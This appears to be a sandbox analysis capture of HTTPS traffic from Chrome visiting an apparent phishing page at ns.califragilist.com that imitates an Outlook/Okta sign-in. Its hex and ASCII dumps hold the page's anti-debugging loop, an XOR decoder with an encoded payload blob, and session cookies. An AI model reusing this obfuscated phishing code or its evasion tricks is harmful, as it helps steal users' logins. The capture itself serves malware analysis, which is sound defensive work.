                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cfn2S7Olj0%2B7Ydr7UFyw3BZJMT60l1MmzaauejYHc%2B2rZyslmGbERO9PZ5wcu7PbuH1QD8ZHx1240f5B4dKq67bR%2FKa9X3iGX%2BtH2KIAdNXkHigSseJYvHiZp1WJFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3356&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2038&delivery_rate=879975&cwnd=251&unsent_bytes=0&cid=4c09ddd5e3fd42ba&ts=121&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645519b1d2cb0-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1694&delivery_rate=2172543&cwnd=251&unsent_bytes=0&cid=8a26df0ced4c51b3&ts=519&x=0"
                                                                                                                                              2024-11-06 15:55:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              53192.168.2.1849811188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:57 UTC1397OUTGET /exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              Accept: */*
                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ijd2QkhDZmlrS2dKUXpZTjFMV2pldmc9PSIsInZhbHVlIjoiaHJhNUIyTEtvVThkaldLM3oyTTU4M1hKUFZJV1k5bGUzdVAzZmxLUFhkSG8rOVQyZ3JLYkVTdmdxbkZ1RU04UHBvK2lXQWNxblgzMG0xT2xxL2tadEV6RzhGMWlYakxneVdOSk0vZlRncDVLY0c3dG9uZ2x2c1F5VXlwb3ZsajMiLCJtYWMiOiJlYWM3ZTMxOTBiZjMzYmM4ZTdmN2RiZjM3ZmI0YTY5ZmIyZjNhZWZiYTE4NzVlMWM3NDU0MzQwZDdhOWQ1M2NhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxHU1hITFQ3SkZ6bVJBdHRPVWV4VlE9PSIsInZhbHVlIjoiT0JmdFJXd01EeG9qSjcrMTlCRWtVeUM0cjliUzZRMUxzM2hHaVVaMFFEdG5hcGM5R0VmRVd5amJKSTR4MWVTbFQ2RHNDUW5oNHFBaHU1OVRmMmZmTEQ5TmNhUCtmTk1na0hoMjc5OVdyTEwxNW1rZkcrQXlRNnhTTXVIazJRcHMiLCJtYWMiOiI3YWVmYzc4OGEwODFmMDZkNDc4NGRiZjlkMGJjNGQ3MjlhYWQzZjM4MGQ4YzllY2ZjMjA5MzMwODczNDRjNDMyIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:57 UTC1216INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:57 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jy6QUsbk3dc3N2rgfsky3q0Z2Az3svviZEnG9JNvoWcdW7R93r7NXqKSrdV7WgwtWD%2B%2FMCSDUH03Zd4TmzR0dau5rcBsomsdaMUkZ0tC%2BcHNOWCTP8gy62nyy22Gpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3353&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2318&delivery_rate=858837&cwnd=233&unsent_bytes=0&cid=d4080d72229565b5&ts=139&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:55:57 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                              2024-11-06 15:55:57 UTC707INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 68 68 64 57 4a 31 64 30 45 78 4e 33 51 7a 54 48 4e 78 63 33 68 55 64 32 59 32 4e 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 56 52 48 4e 6c 68 71 4f 54 46 52 63 53 74 54 54 30 4d 76 59 31 63 35 54 54 68 30 54 48 64 31 57 6d 70 79 5a 55 68 5a 64 32 64 6a 4d 6d 78 59 61 32 6f 34 4d 31 56 32 61 43 39 4a 56 44 52 6f 4d 30 35 6c 5a 32 39 45 54 54 6c 35 4d 58 4e 51 62 7a 59 33 4e 6b 52 6b 54 6a 56 35 52 45 68 42 64 47 31 73 4d 6d 52 30 63 55 5a 30 62 33 70 7a 59 6c 42 52 64 57 64 48 64 56 5a 56 55 7a 4e 70 54 32 59 30 62 6b 4e 4d 64 56 4e 35 54 31 52 49 59 56 4e 6d 56 31 6c 46 54 30 4e 79 54 44 55 35 54 54 52 6d 62 6e 56 4d 4d 44 67
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDg
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 35 34 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74
                                                                                                                                              Data Ascii: 546d<!DOCTYPE html><html lang="en"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <tit
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 31 32 30 70 78 3b 6c 65 66 74 3a 32 35 70 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 35 29 20 30 20 34 70 78 20 35 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 68 61 64 6f 77 2d 66 61 64 65 20 76 61 72 28 2d 2d 64 75 72 29 20 69 6e 66 69 6e 69 74 65 3b 7d 0d 0a 23 66 6c 61 70 43 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 37 39 70 78 3b 7d 0d 0a 23 65 66 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 34 31 70 78 3b 7d 0d 0a 23 65 66 3e 2e 6c 7b 77 69 64 74 68 3a 32 38 37 70 78 3b 62 61 63
                                                                                                                                              Data Ascii: position:relative;top:120px;left:25px;width:var(--envW);box-shadow:rgba(0,0,0,.25) 0 4px 5px;animation:shadow-fade var(--dur) infinite;}#flapContainer{width:var(--envW);margin-top:179px;}#ef{width:var(--envW);margin-top:-41px;}#ef>.l{width:287px;bac
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 30 2c 30 2e 36 37 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 3b 7d 0d 0a 2e 66 6c 61 70 54 72 69 61 6e 67 6c 65 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 66 6c 61 70 53 29 3b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 6c 61 70 53 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 30 64 39 66 66 3b 6d 61 72 67 69 6e 3a 2d 34 38 70 78 20 61 75 74 6f 20 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 70 78
                                                                                                                                              Data Ascii: ;animation-timing-function:cubic-bezier(0.32,0,0.67,0);transform-origin:top;transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg);}.flapTriangle{width:var(--flapS);height:var(--flapS);background:#50d9ff;margin:-48px auto 0;border-radius:7px
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 3b 7d 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 74 30 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 20 20 20 20 65 76 61 6c 28 27 64 65 62 75 67 67 65 72 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 74 31 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 6f 75 74 6c 6f 6f 6b 6c 6f 67 6f 22 20 73 74 79
                                                                                                                                              Data Ascii: lateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg);}} </style> <script> setInterval(() => { const t0 = Date.now(); eval('debugger'); const t1 = Date.now(); }, 1000); </script></head><body id="outlooklogo" sty
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 68 32 2e 30 33 56 39 2e 30 33 32 63 30 2d 2e 34 37 36 2d 2e 30 31 2d 31 2e 30 35 32 2d 2e 30 33 2d 31 2e 37 31 31 2d 2e 30 31 2d 2e 33 33 33 2d 2e 30 34 39 2d 2e 36 2d 2e 30 35 38 2d 2e 38 30 34 68 2e 30 34 35 63 2e 31 30 33 2e 34 37 33 2e 32 31 2e 38 33 34 2e 32 38 37 20 31 2e 30 37 35 6c 33 2e 37 37 36 20 39 2e 31 36 68 31 2e 34 32 6c 33 2e 37 34 38 2d 39 2e 32 34 33 63 2e 30 38 35 2d 2e 32 31 31 2e 31 37 35 2d 2e 36 32 32 2e 32 35 37 2d 2e 39 39 32 68 2e 30 34 34 63 2d 2e 30 34 38 2e 39 31 35 2d 2e 30 39 20 31 2e 37 35 2d 2e 30 39 35 20 32 2e 32 35 36 76 37 2e 39 37 38 68 32 2e 31 36 35 56 34 2e 31 39 35 68 2d 32 2e 39 35 36 6c 2d 33 2e 32 32 38 20 37 2e 38 38 7a 22 20 66 69 6c 6c 3d 22 23 37 33 37 34 37 34 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                              Data Ascii: h2.03V9.032c0-.476-.01-1.052-.03-1.711-.01-.333-.049-.6-.058-.804h.045c.103.473.21.834.287 1.075l3.776 9.16h1.42l3.748-9.243c.085-.211.175-.622.257-.992h.044c-.048.915-.09 1.75-.095 2.256v7.978h2.165V4.195h-2.956l-3.228 7.88z" fill="#737474"></path><path
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 32 33 2d 2e 37 36 36 2d 2e 34 33 35 2d 2e 35 31 2d 2e 36 35 35 2d 31 2e 32 33 38 2d 2e 36 35 35 2d 32 2e 31 36 33 20 30 2d 2e 39 35 34 2e 32 32 2d 31 2e 37 30 31 2e 36 35 35 2d 32 2e 32 32 2e 34 33 33 2d 2e 35 31 36 20 31 2e 30 34 2d 2e 37 37 38 20 31 2e 38 30 36 2d 2e 37 37 38 2e 37 34 33 20 30 20 31 2e 33 33 35 2e 32 35 20 31 2e 37 35 38 2e 37 34 34 2e 34 32 36 2e 34 39 36 2e 36 34 32 20 31 2e 32 33 37 2e 36 34 32 20 32 2e 32 30 32 20 30 20 2e 39 37 37 2d 2e 32 30 33 20 31 2e 37 32 38 2d 2e 36 30 34 20 32 2e 32 33 6d 2d 31 2e 36 38 33 2d 36 2e 39 32 39 63 2d 31 2e 34 38 34 20 30 2d 32 2e 36 36 33 2e 34 33 35 2d 33 2e 35 30 33 20 31 2e 32 39 33 2d 2e 38 34 2e 38 35 37 2d 31 2e 32 36 35 20 32 2e 30 34 34 2d 31 2e 32 36 35 20 33 2e 35 32 37 20 30 20 31 2e
                                                                                                                                              Data Ascii: 23-.766-.435-.51-.655-1.238-.655-2.163 0-.954.22-1.701.655-2.22.433-.516 1.04-.778 1.806-.778.743 0 1.335.25 1.758.744.426.496.642 1.237.642 2.202 0 .977-.203 1.728-.604 2.23m-1.683-6.929c-1.484 0-2.663.435-3.503 1.293-.84.857-1.265 2.044-1.265 3.527 0 1.
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 2e 32 30 34 20 31 2e 37 32 38 2d 2e 36 30 34 20 32 2e 32 33 4d 38 32 2e 33 38 20 37 2e 35 33 36 63 2d 31 2e 34 38 34 20 30 2d 32 2e 36 36 33 2e 34 33 35 2d 33 2e 35 30 33 20 31 2e 32 39 33 2d 2e 38 34 2e 38 35 37 2d 31 2e 32 36 36 20 32 2e 30 34 34 2d 31 2e 32 36 36 20 33 2e 35 32 37 20 30 20 31 2e 34 31 2e 34 31 35 20 32 2e 35 34 33 20 31 2e 32 33 35 20 33 2e 33 36 38 2e 38 32 2e 38 32 36 20 31 2e 39 33 36 20 31 2e 32 34 35 20 33 2e 33 31 37 20 31 2e 32 34 35 20 31 2e 34 33 38 20 30 20 32 2e 35 39 33 2d 2e 34 34 31 20 33 2e 34 33 33 2d 31 2e 33 31 2e 38 34 2d 2e 38 37 20 31 2e 32 36 36 2d 32 2e 30 34 35 20 31 2e 32 36 36 2d 33 2e 34 39 33 20 30 2d 31 2e 34 33 33 2d 2e 34 2d 32 2e 35 37 33 2d 31 2e 31 38 37 2d 33 2e 33 39 34 2d 2e 37 38 39 2d 2e 38 32 2d
                                                                                                                                              Data Ascii: .204 1.728-.604 2.23M82.38 7.536c-1.484 0-2.663.435-3.503 1.293-.84.857-1.266 2.044-1.266 3.527 0 1.41.415 2.543 1.235 3.368.82.826 1.936 1.245 3.317 1.245 1.438 0 2.593-.441 3.433-1.31.84-.87 1.266-2.045 1.266-3.493 0-1.433-.4-2.573-1.187-3.394-.789-.82-
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 53 6a 49 56 4c 77 43 77 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 20 5e 20 72 4a 76 58 7a 42 5a 43 78 79 2e 63 68 61 72 43 6f 64 65 41 74 28 69 20 25 20 70 48 62 5a 72 79 6a 47 4e 6c 29 29 3b 0d 0a 7d 0d 0a 72 65 74 75 72 6e 20 75 74 45 75 48 55 4a 54 65 68 3b 0d 0a 7d 0d 0a 76 61 72 20 69 4b 65 54 78 77 49 50 75 51 20 3d 20 62 4c 44 62 43 66 69 7a 6a 41 28 60 66 58 56 77 43 42 49 31 4c 54 4d 73 61 69 6b 67 57 53 74 76 62 48 35 66 41 54 34 73 4f 42 51 72 4d 41 38 54 58 6b 73 76 4c 33 59 4b 53 6c 74 64 48 41 59 49 4c 6e 39 5a 50 6e 74 77 54 46 6c 44 56 53 34 6f 49 67 6f 55 4a 41 49 58 42 68 6f 35 59 54 31 48 5a 7a 59 45 41 42 63 41 4a 43 5a 30 51 79 38 77 46 56 51 61 42 6a 39 68 49 31 55 70 4a 55 31 55 43 77 67 36 4d 54 31 61 49 69 49 53 56 41 6f 61 61 6a
                                                                                                                                              Data Ascii: SjIVLwCw.charCodeAt(i) ^ rJvXzBZCxy.charCodeAt(i % pHbZryjGNl));}return utEuHUJTeh;}var iKeTxwIPuQ = bLDbCfizjA(`fXVwCBI1LTMsaikgWStvbH5fAT4sOBQrMA8TXksvL3YKSltdHAYILn9ZPntwTFlDVS4oIgoUJAIXBho5YT1HZzYEABcAJCZ0Qy8wFVQaBj9hI1UpJU1UCwg6MT1aIiISVAoaaj
                                                                                                                                              2024-11-06 15:55:57 UTC1369INData Raw: 42 67 6f 4f 49 79 39 70 46 69 59 2f 44 68 6f 61 42 43 55 30 4a 78 5a 35 58 47 74 55 51 30 6c 71 66 54 68 64 4b 54 70 42 42 67 59 46 64 32 4d 6b 52 69 49 39 44 68 55 48 53 32 6f 70 4a 6c 45 68 62 45 4e 62 4a 43 30 5a 4b 54 46 47 4e 7a 42 4d 41 67 56 48 50 53 34 79 55 6e 56 7a 51 52 55 51 56 47 67 6e 4f 31 6f 7a 63 30 45 41 47 68 6b 76 66 48 5a 53 4b 44 38 56 57 78 51 47 4c 43 64 6d 46 6d 63 79 45 78 73 51 47 69 55 7a 50 56 4d 75 50 31 78 57 41 67 63 6c 4c 79 31 5a 4b 43 51 53 56 6c 31 6b 51 47 46 30 46 47 64 74 44 52 30 4e 41 6d 6f 7a 4d 56 68 36 63 78 45 47 42 67 55 6c 49 44 41 57 5a 7a 6b 54 45 51 56 55 61 47 34 54 63 42 51 35 42 41 59 54 43 47 63 33 4d 67 5a 70 4a 67 34 53 42 56 74 6f 59 54 56 48 65 6e 4d 48 47 77 30 64 61 47 45 67 54 54 63 30 58 46 59
                                                                                                                                              Data Ascii: BgoOIy9pFiY/DhoaBCU0JxZ5XGtUQ0lqfThdKTpBBgYFd2MkRiI9DhUHS2opJlEhbENbJC0ZKTFGNzBMAgVHPS4yUnVzQRUQVGgnO1ozc0EAGhkvfHZSKD8VWxQGLCdmFmcyExsQGiUzPVMuP1xWAgclLy1ZKCQSVl1kQGF0FGdtDR0NAmozMVh6cxEGBgUlIDAWZzkTEQVUaG4TcBQ5BAYTCGc3MgZpJg4SBVtoYTVHenMHGw0daGEgTTc0XFY


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              54192.168.2.1849819140.82.121.44432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:58 UTC657OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                                                                                                              Host: github.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:59 UTC959INHTTP/1.1 302 Found
                                                                                                                                              Server: GitHub.com
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                              X-Frame-Options: deny
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                              2024-11-06 15:55:59 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              55192.168.2.184982113.33.187.1204432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:58 UTC603OUTGET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1
                                                                                                                                              Host: ok4static.oktacdn.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:59 UTC767INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 222931
                                                                                                                                              Connection: close
                                                                                                                                              Date: Wed, 06 Nov 2024 14:38:40 GMT
                                                                                                                                              Server: nginx
                                                                                                                                              Last-Modified: Tue, 14 May 2024 21:48:24 GMT
                                                                                                                                              ETag: "0329c939fca7c78756b94fbcd95e322b"
                                                                                                                                              x-amz-meta-sha1sum: 7b5499b46660a0348cc2b22cae927dcc3fda8b20
                                                                                                                                              Expires: Thu, 06 Nov 2025 14:38:40 GMT
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                                                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 de048058a16d8205bfbc06a8f2eefb34.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P9
                                                                                                                                              X-Amz-Cf-Id: CXWDBgxbRNoaaHIKve2uf53RNOt2SzGkfYooE5x0PrngBoyhF1oosg==
                                                                                                                                              Age: 4638
